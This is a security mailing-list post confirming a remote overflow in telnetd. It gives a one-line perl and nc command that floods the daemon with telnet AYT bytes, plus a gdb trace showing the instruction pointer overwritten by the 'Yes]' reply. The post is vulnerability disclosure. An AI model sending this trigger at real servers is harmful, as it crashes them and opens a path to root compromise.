> Posted to bugtraq is a notice about telnetd being remotely root
> exploitable. Does anyone know if it is true ?

Yes, telnetd is vulnerable.

lagoon:venglin:~> perl -e '$c=sprintf("%c%c", 255, 246); sleep 10; print $c
x0 . "\r\n"' | nc localhost 23

(gdb) att 9024
Attaching to process 9024
0x28230f90 in ?? ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x5d736559 in ?? ()
(gdb) bt
#0 0x5d736559 in ?? ()
#1 0x804e9d9 in ?? ()
#2 0x804d1a1 in ?? ()
#3 0x804d6d1 in ?? ()
#4 0x804d14d in ?? ()
#5 0x8049bd3 in ?? ()

The strange %eip value is:

riget:root:/# perl -e 'printf("%c%c%c%c\n", 0x59, 0x65, 0x73, 0x5d)'
Yes]

"\r\n[Yes]\r\n" is response for IAC AYT command string.

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslawfrasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *
To Unsubscribe: send mail to majordomoFreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]